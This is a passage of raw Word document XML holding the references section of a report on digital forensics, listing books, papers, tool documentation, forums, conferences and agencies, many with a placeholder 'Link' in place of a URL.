          <v:rect id="_x0000_i1058" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="629EA6C0" w14:textId="7B6FF29A" w:rsidR="00E2633D" w:rsidRDefault="00E2633D" w:rsidP="00E72A42">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10BAF4DC" w14:textId="7CE331D2" w:rsidR="00E2633D" w:rsidRDefault="00E2633D" w:rsidP="00E72A42">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32FB34A2" w14:textId="6A1F01B1" w:rsidR="0096762A" w:rsidRDefault="0096762A" w:rsidP="00E72A42">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4290D125" w14:textId="48B45D38" w:rsidR="0096762A" w:rsidRDefault="0096762A" w:rsidP="00E72A42">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A6912F2" w14:textId="3C08B371" w:rsidR="0096762A" w:rsidRDefault="0096762A" w:rsidP="00E72A42">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34D8D49C" w14:textId="7D614759" w:rsidR="0096762A" w:rsidRDefault="0096762A" w:rsidP="00E72A42">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17FB2A01" w14:textId="198727D5" w:rsidR="0096762A" w:rsidRDefault="0096762A" w:rsidP="00E72A42">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="710FC415" w14:textId="04E25231" w:rsidR="0096762A" w:rsidRDefault="0096762A" w:rsidP="00E72A42">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7977DF50" w14:textId="06BF0524" w:rsidR="0096762A" w:rsidRDefault="0096762A" w:rsidP="00E72A42">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6934D9F7" w14:textId="2B9AD929" w:rsidR="0096762A" w:rsidRDefault="0096762A" w:rsidP="00E72A42">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E89BA1B" w14:textId="77777777" w:rsidR="0096762A" w:rsidRDefault="0096762A" w:rsidP="00E72A42">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31806EA8" w14:textId="13FE8DD5" w:rsidR="0096762A" w:rsidRPr="0096762A" w:rsidRDefault="0096762A" w:rsidP="0096762A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0096762A">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>References</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2721E139" w14:textId="77777777" w:rsidR="0096762A" w:rsidRPr="0096762A" w:rsidRDefault="0096762A" w:rsidP="0096762A">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59CA1867" w14:textId="77777777" w:rsidR="0096762A" w:rsidRPr="0096762A" w:rsidRDefault="0096762A" w:rsidP="0096762A">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0096762A">
        <w:rPr>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1. Current State of the Field:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3917194F" w14:textId="77777777" w:rsidR="0096762A" w:rsidRPr="0096762A" w:rsidRDefault="0096762A" w:rsidP="0096762A">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0096762A">
        <w:rPr>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>References:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4632C922" w14:textId="77777777" w:rsidR="0096762A" w:rsidRPr="0096762A" w:rsidRDefault="0096762A" w:rsidP="0096762A">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0096762A">
        <w:rPr>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Carrier, B. (2013). "Digital Forensic Research: The Next 10 Years." Link</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="255B0A99" w14:textId="77777777" w:rsidR="0096762A" w:rsidRPr="0096762A" w:rsidRDefault="0096762A" w:rsidP="0096762A">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0096762A">
        <w:rPr>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Casey, E. (2011). "Digital Evidence and Computer Crime." Academic Press.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B262FA" w14:textId="77777777" w:rsidR="0096762A" w:rsidRPr="0096762A" w:rsidRDefault="0096762A" w:rsidP="0096762A">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0096762A">
        <w:rPr>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2. Intersection of Digital Forensics and Cybersecurity:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468BF107" w14:textId="77777777" w:rsidR="0096762A" w:rsidRPr="0096762A" w:rsidRDefault="0096762A" w:rsidP="0096762A">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0096762A">
        <w:rPr>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>References:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01AA7C14" w14:textId="77777777" w:rsidR="0096762A" w:rsidRPr="0096762A" w:rsidRDefault="0096762A" w:rsidP="0096762A">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0096762A">
        <w:rPr>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Pollitt, M. M., &amp; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0096762A">
        <w:rPr>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Bidgoli</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0096762A">
        <w:rPr>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, H. (Ed.). (2019). "Handbook of Research on Digital Crime, Cyberspace Security, and Information Assurance." IGI Global.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0466B947" w14:textId="77777777" w:rsidR="0096762A" w:rsidRPr="0096762A" w:rsidRDefault="0096762A" w:rsidP="0096762A">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0096762A">
        <w:rPr>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Rehman, R., &amp; Chang, V. (2018). "Cyber Security and Digital Forensics: An Overview of Issues and Challenges." Link</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73DE7A23" w14:textId="77777777" w:rsidR="0096762A" w:rsidRPr="0096762A" w:rsidRDefault="0096762A" w:rsidP="0096762A">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0096762A">
        <w:rPr>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3. Emerging Trends:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39007B08" w14:textId="77777777" w:rsidR="0096762A" w:rsidRPr="0096762A" w:rsidRDefault="0096762A" w:rsidP="0096762A">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0096762A">
        <w:rPr>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>References:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="627CA2DE" w14:textId="77777777" w:rsidR="0096762A" w:rsidRPr="0096762A" w:rsidRDefault="0096762A" w:rsidP="0096762A">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0096762A">
        <w:rPr>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Quick, D., &amp; Choo, K. K. R. (2014). "Current Trends and Challenges in Digital Forensic Investigation." Link</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62810AFE" w14:textId="77777777" w:rsidR="0096762A" w:rsidRPr="0096762A" w:rsidRDefault="0096762A" w:rsidP="0096762A">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0096762A">
        <w:rPr>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Kohn, M. (2020). "Digital Forensics Trends and Future." Link</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8FA524" w14:textId="77777777" w:rsidR="0096762A" w:rsidRPr="0096762A" w:rsidRDefault="0096762A" w:rsidP="0096762A">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0096762A">
        <w:rPr>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4. Key Challenges:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20BF1B04" w14:textId="77777777" w:rsidR="0096762A" w:rsidRPr="0096762A" w:rsidRDefault="0096762A" w:rsidP="0096762A">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0096762A">
        <w:rPr>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>References:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E7C2020" w14:textId="77777777" w:rsidR="0096762A" w:rsidRPr="0096762A" w:rsidRDefault="0096762A" w:rsidP="0096762A">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0096762A">
        <w:rPr>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Cohen, F. (2019). "Key Challenges in Digital Forensics." Link</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE943E4" w14:textId="77777777" w:rsidR="0096762A" w:rsidRPr="0096762A" w:rsidRDefault="0096762A" w:rsidP="0096762A">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0096762A">
        <w:rPr>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Slay, J., &amp; Martinez, D. (2014). "Challenges and Opportunities in Digital Forensics." Link</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41DE5A9E" w14:textId="77777777" w:rsidR="0096762A" w:rsidRPr="0096762A" w:rsidRDefault="0096762A" w:rsidP="0096762A">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0096762A">
        <w:rPr>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5. National and International Job Market:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A47429B" w14:textId="77777777" w:rsidR="0096762A" w:rsidRPr="0096762A" w:rsidRDefault="0096762A" w:rsidP="0096762A">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0096762A">
        <w:rPr>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>References:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD2FAAA" w14:textId="70AC9D1F" w:rsidR="0096762A" w:rsidRPr="0096762A" w:rsidRDefault="0096762A" w:rsidP="0096762A">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0096762A">
        <w:rPr>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ceresco’s</w:t>
      </w:r>
      <w:r w:rsidRPr="0096762A">
        <w:rPr>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. (2021). "Digital Forensics Job Market Overview." Link</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE73B1A" w14:textId="77777777" w:rsidR="0096762A" w:rsidRPr="0096762A" w:rsidRDefault="0096762A" w:rsidP="0096762A">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0096762A">
        <w:rPr>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>InfoSec Institute. (2021). "Digital Forensics Jobs: What You Need to Know." Link</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D32B49" w14:textId="29149AD6" w:rsidR="0096762A" w:rsidRPr="0096762A" w:rsidRDefault="0096762A" w:rsidP="0096762A">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0096762A">
        <w:rPr>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Please ensure to check for the most recent publications and updates in your field of interest. Online databases, academic journals, and industry reports will be valuable resources for obtaining the latest information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1684BEDD" w14:textId="34B59133" w:rsidR="0096762A" w:rsidRPr="0096762A" w:rsidRDefault="0096762A" w:rsidP="0096762A">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="349020E1" w14:textId="184A18EE" w:rsidR="0096762A" w:rsidRPr="0096762A" w:rsidRDefault="0096762A" w:rsidP="0096762A">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DAB16FC" w14:textId="579DA80C" w:rsidR="0096762A" w:rsidRPr="0096762A" w:rsidRDefault="0096762A" w:rsidP="0096762A">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5644C0C8" w14:textId="77777777" w:rsidR="0096762A" w:rsidRPr="0096762A" w:rsidRDefault="0096762A" w:rsidP="0096762A">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CC050B8" w14:textId="77777777" w:rsidR="0096762A" w:rsidRPr="0096762A" w:rsidRDefault="0096762A" w:rsidP="0096762A">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0096762A">
        <w:rPr>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1. Official Documentation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E57051" w14:textId="77777777" w:rsidR="0096762A" w:rsidRPr="0096762A" w:rsidRDefault="0096762A" w:rsidP="0096762A">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0096762A">
        <w:rPr>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Refer to the official documentation of widely used tools such as EnCase [1], Forensic Toolkit (FTK) [2], Autopsy [3], and Cellebrite [4]. These resources offer detailed insights into the features, functionalities, and capabilities of each tool.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4512CC96" w14:textId="77777777" w:rsidR="0096762A" w:rsidRPr="0096762A" w:rsidRDefault="0096762A" w:rsidP="0096762A">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D3F6550" w14:textId="77777777" w:rsidR="0096762A" w:rsidRPr="0096762A" w:rsidRDefault="0096762A" w:rsidP="0096762A">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0096762A">
        <w:rPr>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2. Digital Forensics Community Forums:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041EB191" w14:textId="77777777" w:rsidR="0096762A" w:rsidRPr="0096762A" w:rsidRDefault="0096762A" w:rsidP="0096762A">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0096762A">
        <w:rPr>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>For practical insights and user experiences, explore forums like Forensic Focus [5] or Digital Forensics Forums [6]. Community discussions often provide valuable information on real-world applications and challenges associated with different tools.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="288EB2C3" w14:textId="77777777" w:rsidR="0096762A" w:rsidRPr="0096762A" w:rsidRDefault="0096762A" w:rsidP="0096762A">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="056CA754" w14:textId="77777777" w:rsidR="0096762A" w:rsidRPr="0096762A" w:rsidRDefault="0096762A" w:rsidP="0096762A">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0096762A">
        <w:rPr>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3. Industry Publications:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="345BF5BE" w14:textId="77777777" w:rsidR="0096762A" w:rsidRPr="0096762A" w:rsidRDefault="0096762A" w:rsidP="0096762A">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0096762A">
        <w:rPr>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Industry publications such as the "Journal of Digital Investigation" [7] and cybersecurity magazines may feature reviews and analyses of the latest digital forensic tools. These publications can provide an overview of industry trends and emerging technologies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46EF44A7" w14:textId="77777777" w:rsidR="0096762A" w:rsidRPr="0096762A" w:rsidRDefault="0096762A" w:rsidP="0096762A">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64299135" w14:textId="77777777" w:rsidR="0096762A" w:rsidRPr="0096762A" w:rsidRDefault="0096762A" w:rsidP="0096762A">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0096762A">
        <w:rPr>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4. Conferences and Events:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B49697" w14:textId="77777777" w:rsidR="0096762A" w:rsidRPr="0096762A" w:rsidRDefault="0096762A" w:rsidP="0096762A">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0096762A">
        <w:rPr>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Explore proceedings from digital forensics conferences like the Digital Forensics Research Conference (DFRWS) [8] and the International Conference on Digital Forensics &amp; Cyber Crime (ICDF2C) [9]. Conferences often showcase cutting-edge research and advancements in forensic tools.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1001EDC2" w14:textId="77777777" w:rsidR="0096762A" w:rsidRPr="0096762A" w:rsidRDefault="0096762A" w:rsidP="0096762A">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="350AE938" w14:textId="77777777" w:rsidR="0096762A" w:rsidRPr="0096762A" w:rsidRDefault="0096762A" w:rsidP="0096762A">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0096762A">
        <w:rPr>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5. Government and Law Enforcement Reports:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA1D697" w14:textId="77777777" w:rsidR="0096762A" w:rsidRPr="0096762A" w:rsidRDefault="0096762A" w:rsidP="0096762A">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0096762A">
        <w:rPr>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Government agencies and law enforcement organizations often release reports or guidelines on digital forensics. Check organizations like the National Institute of Standards and Technology (NIST) [10] or INTERPOL [11] for authoritative insights.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B2697A" w14:textId="77777777" w:rsidR="0096762A" w:rsidRPr="0096762A" w:rsidRDefault="0096762A" w:rsidP="0096762A">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5485224B" w14:textId="77777777" w:rsidR="0096762A" w:rsidRPr="0096762A" w:rsidRDefault="0096762A" w:rsidP="0096762A">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="398871CB" w14:textId="77777777" w:rsidR="0096762A" w:rsidRPr="0096762A" w:rsidRDefault="0096762A" w:rsidP="0096762A">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0096762A">
        <w:rPr>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Digital Forensics Magazine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="428256C8" w14:textId="77777777" w:rsidR="0096762A" w:rsidRPr="0096762A" w:rsidRDefault="0096762A" w:rsidP="0096762A">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0096762A">
        <w:rPr>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SANS Digital Forensics and Incident Response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D480EED" w14:textId="77777777" w:rsidR="0096762A" w:rsidRPr="0096762A" w:rsidRDefault="0096762A" w:rsidP="0096762A">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0096762A">
        <w:rPr>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>NIST Computer Forensics Tool Testing Program</w:t>
      </w:r>
    </w:p>
